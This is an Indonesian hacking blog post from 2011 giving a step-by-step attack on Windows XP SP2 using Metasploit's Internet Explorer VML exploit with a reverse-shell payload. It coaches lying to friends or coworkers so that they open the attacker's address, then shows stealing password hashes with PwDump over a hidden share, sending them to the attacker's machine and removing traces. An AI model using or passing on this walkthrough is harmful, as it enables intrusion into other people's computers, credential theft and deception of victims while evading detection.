Thursday, 7 July 2011

[Hack] Exploit Windows XP SP2

Dalam hack kali ini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2

Disini, saya akan menggunakan Metasploit Framework. Untuk yang belum paham, metasploit framework adalah sebuah aplikasi atau tempat yang lengkap untuk menulis, membuat, dan menguji berbagai kode eksploitasi yang telah kita buat.


Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya. 

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Untuk lebih lanjut dapat anda baca disini. Sekarang mari kita praktekkan!!
Pertama2 jalankan ‘mfsconsole’!
main1.JPG
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.
Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).

Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan tampak seperti gambar berikut :
exploit1.JPG
Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D
Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!
Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!
Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :
pwdump.JPG
Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah
C:\temp\Pwdump –o pass.txt 127.0.0.1
Klo berhasil akan tampak pada gambar berikut.
 dump1.JPG
 Lalu copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.
clean.JPG
Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).
Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Selamat Mencoba..

Sumber : http://chaidir.wordpress.com

0 comments:

Post a Comment

Advertisements

Dukungan berupa donasi dari Anda akan sangat berarti bagi eksistensi dan pengembangan blog ini
Anda dapat memberikannya dengan mengklik iklan banner di samping atau di bawah ini

adf.ly - shorten links and earn money!
2012 2014 3 ACDC add on afilasi age of empires; stronghold; yugioh; nyamuk; xilisoft; video converter; software; game air dingin alejandro alex noerdin alex sumsel Allanis Morisette anak anjing android aneh Animasi anjing antichrist Antivirus aplikasi astronomi avatar ayodance background badai badai matahari bahasa pemrogaman band bangun battlenet bayi BB bbm beladiri belajar beras berita berpikir bijak bijaksana biji bintang bisnis online blackberry blogger Blur bodoh bohong bos bos beras browser C# C++ cambridge capoeira cara cara kerja otak catur CBS cerita cerita; lucu; joko; conditoner cerita; tips; pekerjaan; impian; bu haji; pemuda; motivasi; renungan cewek cheat china chinese paladin coba-coba coldplay concert crack curhat deep freeze dialog diam ditutup dns changer doa dog dota download drama duid dunia ebay ebook efek emulator eng-article Eric Clapton facebook fast food FBI film flu full version funny G3 gambling Game gempa gender gigitan gogamers GOGS gproxy gratis GUI gumiho Guns N Roses hack hacker hacking hadir hahaha handphone hang hari ibu Harry Potter heboh hewan hoki hp html hu ge hujan salju humor hunan tv ibu idm IELTS ielts preparation ikan ilegal imaginasi indah industri info internet ios iphone iseng jahil jantung java jelek jenis jenis makanan John Mayer joke jre jss jsstripler judi jujur justbeenpaid kalkulator karakter karyawati katak kehidupan kemampuan otak kepiting kepribadian kertas kesalahan ketawa kiamat Kim Dotcom kisah kodok komputer korea kriminal kucing Lady Gaga lagu laut lelaki lelang lele lesbian liberty reserve liu shi shi LR luas lucu lugu makan makanan malang malware man and woman manusia mata matahari matematika math megaupload melotot menarik mengatur menghitung menu motivasi mujur musik NBC negara Neobux news ninja saga nonton o2jam OASIS offline opengamers opera OPGS opmin OST palembang pekerjaan; impian; menyenangkan; tips; pelajaran hidup pempek pencuri pengalaman pengganti penyakit perbedaan pria dan wanita perempuan pesan moral phk phone photoshop; cs6; notepad; game; software; fifa; adobe; flash builder; ms office; angry birds; craagle; keygen; serial; dota 2; avast; antivirus; cheat; starcraft II; starcraft 2; converter; program phyton pike plan Point Blank pria profit profitclicking program programming psikologi ptc; iconbux; scam; waspada; pay to click ptc; scam; pay to click pulau pulau hoga Radiohead rahasia raja rambutan real story refreshing rencana renungan revolusi revolusi industri Rihanna romansa sakit sakit jantung satu kata scam scar of sky script sehat sejarah serakah serangan server dota shoutmix situs snsd software solusi song sosialitas sumpit sumsel superstar susah tidur symbian tahun baru Taylor Swift Teknologi tersedak test three tips tips; jaringan; berita; penyakit; sakit; kanker tomcat true story tugas Tuhan tukang cukur tune up tutorial tv tvuplayer U2 uang ucweb unik vampire van halen video volume wanita warcraft III website Weezer wi-fi win xp windows windows xp wisata x-plore xuan yuan sword youtube zynga poker